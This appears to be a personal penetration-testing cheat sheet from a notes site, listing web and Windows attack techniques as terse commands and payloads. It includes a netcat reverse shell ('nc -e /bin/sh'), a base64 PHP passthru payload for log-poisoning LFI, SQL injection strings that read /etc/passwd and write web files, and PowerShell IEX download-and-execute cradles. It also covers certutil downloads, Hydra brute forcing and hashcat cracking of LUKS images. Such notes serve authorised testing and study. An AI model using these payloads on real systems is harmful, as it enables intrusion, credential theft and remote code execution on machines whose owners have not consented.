Methods

RCE

; or | to add commands

LFI

  • traverse directories

  • /proc/self/environ

    • can also be done on other log files

    • can send base64 encoded scripts through and decode

    • ssh [payload]@[hostip]

    • payload would be something like <?php passthru(base64_decode('[b64encoded string]')); ?>

  • use burp to mod headers

  • nc -e /bin/sh [ip] [port]

    • add listener first nc -lvnp [port]

  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

RFI

  • storing a txt file on webserver of a machine we have access to which can connect to the machine we want access to (we want to attack MS VM we have access to Kali VM, store file on Kali, use LFI but pass in url to file to pull, add ? to param to get it to execute as php, change caps of protocol for bypassing some checks)

File uploads

  • change mime type

  • change file extension

  • add magic characters

SQL Injection

  • in forms:

    • check with pass' and 1=1# in password field if you have a valid login

    • can also use pass' OR 1=1# with an invalid login but have a good username

    • could also just use username field if good username: admin'#

    • if there are checks on the client side, can remove onsubmit functions in the dom or intercept good data on burp and modify before it's sent to include the SQLi

  • in get params:

    • try order by 1#, may have to urlencode # to %23

    • use this to increment through column count then you can union select 1,2,3..n%23

    • union select 1,table_name,null,null,..,n from information_scema.tables

    • etc,etc

  • to bypass some filtering, you may need to convert strings into hex, urlencode everything and send it

  • sometimes changing param sequences or case will bypass some filters as well

  • when records are limited, iterate in sql to get all info desired

      • limit 0,1 then 1,1, 2,1, etc etc

  • reading files: union select load_file('/etc/passwd'),2 #

  • write to file: union select 'test text',null into outfile '/var/www/output.txt'#

    • may not have write access, use LFI for possible workaround if available - write to /tmp with sql injection, use LFI to access file (could also to RFI if separate machines have different vulns)

  • Tools

    • sqlmap

      • sqlmap -r [filename].req --level 4 --risk 3

XSS

  • more info from python course

  • url params and input boxes

  • <script>alert('1')</script>

  • often change case to fool filters

  • look at page source to see how code is being output and modify accordingly

  • urling urlencoding is almost always helpful

  • always try to modify the DOM (remove inline methods, remove maxlength attributes, etc)

  • get charcode, use String.fromCharCode instead of using quotes

Cookies

  • simple cookies can be manipulated to allow access (uid, etc)

CSRF

  • make a hidden version of a form that submits on load

Creating Wordlists

  • crunch: crunch [min] [max] [chars] -t [pattern] -o [filename]

  • crunch 6 8 123abc$ -o wordlist -t a@@@@b, 6-8 chars, include 1,2,3,a,b,c,$, start with a, end with b

encrypted cookies

  • can sometimes be busted with padbuster

Brute forcing

  • Hydra

    • hydra [hostIP] -l [login] -L [loginfile] -p [pass] -P [passfile] -C [user:pass file] [service]

    • for web form, append "path-to-form.ext:[username]=^USER^&password=^PASS^&other-param=param:F=Not Logged In String"

ZAP

  • automated scanning, but more manual than many of the tools

  • can audit all scans after

hashcat

  • hashcat --example-hashes

  • LUKS exncrypted disk images

    • cryptsetup luksDump [imgfile] to get payload offet +1

    • dd if=[imgfile] of=[outfile] bs=512 count=[offset]

    • hashcat -m 14600 [file] [wordlist]

mounting LUKS disk image

  • cryptsetup luksOpen backup.img [name]

  • ls /dev/mapper

  • mount /dev/mapper/[name] /mnt

PowerShell

  • powershell can switch from cmd to powershell

  • Downloading files:

    • IEX(New-Object Net.WebClient).downloadString('http://[host]/[file]')

    • (New-Object Net.WebClient).downloadString('http://[host]/[file]')

    • Invoke-WebRequest -Uri http://[host]/[file]

      • IWR -uri http://[host]/[file] also works

      • -OutFile C:\\windows\\temp\\filename.ext to specify a filename

    • if in cmd shell, need to use powershell prefix

  • listing all files:

    • gci -recurse . | select fullname

  • copy binary file to b64 string for rebuilding:

    • certutil -encode [filepath] [outfile path].b64

    • type [outfile path].b64

    • copy, paste to file on host

    • base64 decode it:

      • base64 -d [filename].b64 > [filename].ext

  • creating credentials from string

    • $pass = ConvertTo-SecureString '[pass]' -AsPlainText -Force

    • $cred = New-Object System.Management.Automation.PSCredential("[user]",$pass)

    • hostname

    • Invoke-Command -Computer [hostnmame] -ScriptBlock { whoami } -Credential $cred

      • can use this to then run another IWR to grab a shell and get escalated shell

  • useful to use rlwrap on your listener:

    • rlwrap nc -lvnp 9001 - this will give history up arrow, ctrl L to clear, etc.

  • bypass admin lockout if in admin group

    • net use Z: \\127.0.0.1\c$

    • z:

  • UACME for ways to bypass UAC

CMD

  • download a file

    • certutil -urlcache -f http://[host]/[file] [outfile path]

TheHarvester

whatweb

wappalyzer

pownjs

PreviousReverse Shells CheatsheetNextLinux

Last updated